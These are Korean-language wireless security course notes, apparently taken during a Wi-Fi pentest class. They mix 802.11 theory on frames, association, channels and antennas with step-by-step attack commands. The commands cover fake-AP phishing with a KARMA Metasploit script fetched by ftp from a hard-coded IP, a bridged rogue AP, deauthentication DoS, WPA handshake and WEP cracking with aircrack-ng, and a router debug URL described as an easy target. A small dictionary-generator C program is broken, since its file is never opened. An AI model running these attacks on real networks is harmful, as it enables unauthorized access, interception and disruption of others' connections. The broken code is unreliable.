BA

시간 동기화 해야 접속 됨

호환성 문제 

IE 호환성 추가 

--------

ssid까지 등록 해줘야 인가 완료 됨 

초기화는 서버에 접근해야 함 

naver.com

573051016

2911

id: config

pw: config

재부팅 

reboot : yes

초기화 

db reset : yes

------------

개발 분야

c + winAPI 

c +  Java 

디자인 입히는건 MFC

JNI -> c로 모듈을 만들어서 Java로 불러씀 -> 10배는 빠름 

---------

진단 

분석(Cert)

악성코드 분석

백신엔진 업그레이드 -> 파일에 대한 구조 분석 

침해 사고 대응 

------------------

사용자 인증

데이터 암호화 

비밀번호 관리 

802.1x는 깨기가 힘들다

-> 누가 접근을 하면 막는 형태 

-> 주기적으로 암호를 바꿔줌 

-> 비용적인 부분에서 많이 구축을 안 하는 타입 

-> 호환성이 높다 

802.11i 

기업용모드는 깨기 힘들다

개인모드는 깰 수 있다 

Radius 서버 

WIDPS -> 시중에 나와있는 방화벽이 잘 안 된다 

이웃자산 보호 -> 외부 네트워크를 rogue AP로 등록하면 외부 네트워크가 막혀버림 

------------

phising 

동일한 ssid -> dos공격은 5회가 가장 적당 -> 끊어졌다가 다시 붙으면서 공격자의 AP로 붙음 

파일을 다운 받으라, 로딩한다고 나옴 

백트랙/ 칼리마다 방식이 조금 다름 

기존 방법에선 dhcp3-server를 사용했으나 

칼리에서는 isc-dhcp-server를 사용 해야 함 

dhclient eth0

install dhcp3-server

vi /etc/dhcp3/dhcpd.conf  에 덮어쓰기 

ssid 생성

airbase-ng -P -C3- -e "사용할 SSID" -v mon0  -> at0 가상 인터페이스가 생김 

-> airbase를 취소하면 사라짐 

gateway IP 설정

ifconfig at0 up 10.0.0.1 netmast 255.255.255.0

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 

ifconfig at0

권한설정

mkdir -p /var/run/dhcpd && chown dhcpd.dhcpd /var/run/dhcpd

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

-----------

airmon-ng stsart wlan0

dhclient eth0

apt-get install isc-dhcp-server

ftp 61.76.181.14

get karma.rc

get dhcpd.conf

airbase-ng -c 1 -e 가상의 SSID -y -v mon0

-c  -> 채널 

-e  -> ssid

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

cp dhcpd.conf /etc/dhcp/

/etc/init.d/isc-dhcp-server restart

msfconsole -r karma.rc

-> 끊어 졌다 다시 붙을때 어디로 붙을지 모름 

-> 무선 ssid를 여러개 만들어 뿌리는 방법이 있지만 비추 

-> 전체 스캔을하면 채널이 돌기 때문에 공격이 잘 안 됨 

-> 채널 고정하여 덤프 모니터해야 함 

-------------

Rougue AP 

칼리 brctl 명령어가 없음 -> apt-get install bridge-utils

iwconfig 

airmon-ng start wlan0

airbase-ng -c 1 --essid 무선 네트워크이름 -y -v mon0

brctl addbr [네트워크 브릿지 이름]

brctl addif [네트워크 브릿지 이름] eth0

brctl addif [네트워크 브릿지 이름] at0

ifconfig eth0 0.0.0.0 up

ifconfig at0 0.0.0.0 up

dhclient [네트워크 브릿지 이름]

echo 1 > /proc/sys/net/ipv4/ip_forward

칼리.txt

WPA Handshake를 캡처하기 위하여 Dos 공격 수행

aireplay-ng -0 [공격횟수] -a [ap mac] -c [client mac] mon0 [enter]

사전파일을 이용하여 Key를 크랙한다

aircrack-ng -b [ap mac] -w [사전파일명] [filename] [enter]

wep

airedecap-ng -w [Password, 아스키형태] [캡처한 파일]

wpa

airedecap-ng -p [Password, 그냥 값] [캡처한 파일명] -e "[ssid]"

아이피 타임 -> 펌웨어로 공격하면 잘 먹힌다 함 

http://공유기주소/cgi-bin/timepro.cgi?flag=debug

WEP crack

무선 랜카드를 모니처링 모드로 전환 

airmon-ng start wlan0 [enter]

무선 데이터를 수집

airdump -c [채널] -bssid [AP mac] -w [filename] mon0 [enter]

ARP Injection 공격으로 Data 강제 유발 

airplay-ng -3 -b [ap mac] -h [lan mac] mon0 [enter]

  lan mac -> 연결되어 있는 station의 mac주소 

aircrack-ng [file name] [enter]

--------

공유기 설정 

초기화 버튼 13초 눌러야 초기화 됨 

----------------

WPA crack

데이터를 많이 모을 필요 없음 

4-way handshake 중에 인증 패킷 하나만 캡쳐해서 사전파일이용 

DOS공격으로 끊어주고 인증과정을 의도적으로 발생시킴 

사전 파일 작성 

#include <stdio.h>

#include <string.h>

int main(){

int i=0;

FILE *fp;

if(fp){

     for(i;i<1001;i++){

fprintf(fp,"%010d",i);

     }

}

fclose(fp);

return 0;

}

802.11 Frame 

frame type - Control, Data, management

sub type - RTS... data... beacon...

FC

Duration /ID   -> NAV information,  절전모드에서 깨어날때 PS-Poll로 체크 

address1 -> mac 주소 

address 2 -> mac 주소 

address 3 -> mac 주소 

sequence control -> MSDU, sequence number, fragment number

address 4 -> mac 주소 

DATA

FCS

FC -> ...

     -> more fragments -> 뒤에 data가 더 있으면 1, 없으면 0  

-> sequence control 아래  fragment number에 기록됨 

     -> more data -> -> 뒤에 data가 더 있으면 1, 없으면 0  

-> sequence control 아래  sequence number에 기록됨 

     -> Retry -> 재전송 -> 재전송하면 1 아니면 0 

     -> power management -> 절전 모드 

     -> WP -> 공유기 암호화 방식중에 하나 -> 0이면 암호화 되있는것 아니면 1

-> 공장 초기화 암호들을 기반으로 만든 사전 파일을 쓰면 금방 뜷림

-> 특정 규칙을 기반으로 만든 암호 사전 파일을 쓰면 잘 뜷림 

-> 무선에서 못깨는 암호는 없다고 보면 됨 

----------------

802.11 결합과정 (Passive)

해킹에 직접적인 도움이 되는 부분 

<--------beacon ---------------

station         ------ Authentication Request ---->        AP

<-----Authentication Response----

------ Association Request ------>

------ Association Response ----->

-> 관점이 항상 station 관점이다 

beacon -> SSID, CH, 암호방식, 신호세기, (BSSID)에 관한 정보를 가짐 

                   -> BSSID는 스캐닝을 해야 볼수 있음 

-> SSID는 중복되면 하나만 드러남, 신호가 가장 쎈게 드러남 

인증과 결합 -> IP를 받아 오는 중 -> 연결됨 -> 통신 가능 

    -> 거의 AP는 DHCP를 운영한다고 보면 됨 

-> 무선 profile에 기존의 정보들이 담겨져서 다음에는 자동으로 연결됨 

-----------

802.11 결합과정 (Active)

-------- Probe Request ------->

<--------Probe Response------

station         ------ Authentication Request ---->        AP

<-----Authentication Response----

------ Association Request ------>

------ Association Response ----->

SSID 비공개 -> 기타 네트워크에서 beacon 없이 Probe Request 전송하여 접속 

숨겨진 SSID 찾기 -> Probe Request 패킷을 이용하여 파악 

-> 이미 연결된 사용자의 연결을 DOS로 끊고 나서 

다시 연결할때 Probe Request 확인 

-----------

암호가 없으면 인증을 하는가 ???

--- 오픈 시스템이 맞습니까 ? ---> 

<--- 오픈 시스템이 맞습니다 ---

-----------

Packet Capture 

wireshark로 캡처 가능 

wlan.fc.type==0

wlan.fc.type==1

wlan.fc.type==2

wlan.bssid==?

-------

hidden node 

RTS(나 데이터 보낼건데...)/ CTS (a랑 데이터 주고받는다)

-> 데이타 충돌 방지 

NAV- network allocation vector 

--------

powersave 

절전모드 

PM -> power management

PM 이 1이면 절전모드

절전모드에서 해제되어야 데이터송수신가능 -> 깨우기 -> Ps Poll -> 잠깐 절전모드에서 해제 

-------

datarate

거리와 데이터 송수신 관계 

인접 범위에서 무선에 접속하여 방화벽을 손쉽게 우회할 수 있게될 수도 있음 

-> 기업에서 무선을 지양하는 이유 

-> 전송세기를 낮추어서 신호가 외부로 확산되는 것을 방지하기도 함 

주파수 대역마다 데이터 확산 정도가 다름 

802.11 a

802.11 b

802.11 g

-> 고급장비들은 datarate를 기준으로 접속 차단

---------

Channel 

0.005 -> 1칸

4칸을 띄워야 간섭이 안 일어남 

-> 주파수를 많이 쓰고 있기때문에 간섭은 일어날 수 밖에 없음 

-> a 채널을 쓰면 지원되는 랜카드도 잘 없지만 쓰는 사람도 별로 없는 편

--------------

802.11 Pentest

Rougue AP

Ad-Hoc

Phishing

Probing Station

Dos

Mac Spoofing

정책위반 

RF  감쇄 요인 

금속               매우 높음 

방탄유리

시멘트

종이 

대리석

벽돌

물

유리

석면

합성물질

플라스틱

목재

공기중            가장 낮음

-------------

무선은 90%이상 사설 IP 대역 

스마트폰 3G는 공인

무선단말기에 무선 랜카드가 장착되면 station이라고 부른다

--------

DS -> 유선 네트워크 구간 

BSS

basic service set -> 무선공유기 하나만을 두고 이야기 함 -> 한개의 ap와 연결되어 있는 경우 

BSSID -> ap의 mac주소를 뜻함 

SSID -> 무선 네트워크 이름 

ESS -> 무선 네트워크 서비스를 2개 이상, 전체를 이야기 할때 

Ad-Hoc

무선 공유기 없이 단말기-단말기간의 통신 -> 스마트폰의 hot spot과 유사 

----------

802.11 a,b,g

와이파이는 속도때문에 나중에 한물갈것이다~ 라는 전망 

와이파이 켜놓고 다니면 해킹당하기 아주 쉬움 

-------------

CSMA /CA 

sourtce    ----- RTS packet  ----> Destination

(단말기)                                        ( AP)

-> 무선 네트워크에서 데이터 충돌을 피하는 법 ->     

WIPS -> 무선 방화벽 

sniffing -> 공유기 암호 크랙, 패킷 스냅핑 

Phising -> 가짜 공유기를 만들어 유인 

DOS -> 무선공유기에서 연결된 모든 연결을 다 끊음, 현재로서는 막을 수 없음 

-> 방화벽에서도 DOS를 쓴다

---------------

IEEE 802.11

무선 네트워크에 관한 표준 

WPAN -> bluetooth

WLAN

WMAN

WWAN

국가별 주파수 사용 대역 

주파수의 간섭을 피하기 위해 사용하는 주파수간에 적절한 간격을 둠 

주파수 채널 때문에 공격하기 까다로울 수 있음

라디오 -> 브로드 캐스트 

안테나 

공격전 어떤 공유기들이 있는지 탐지, 스캐닝할때 안테나를 사용

먼 곳에 있는 공유기들도 탐지 

Omni -> point to multi point 

무지향성

신호가 퍼짐 

Directional 

지향성 

스니핑하고자 하는 패킷을 잡기위해 

ex)무선 공유기 중계기 

신호가 거의 직선적으로 나감, 신호가 멀리 퍼지지 않고 감, 날씨 영향을 받음 

프링글스통으로도 만든다고 함 

불심검문에 창문 바깥으로 대형 안테나를 들이밀고 있어서 잡힌 3인조 해커들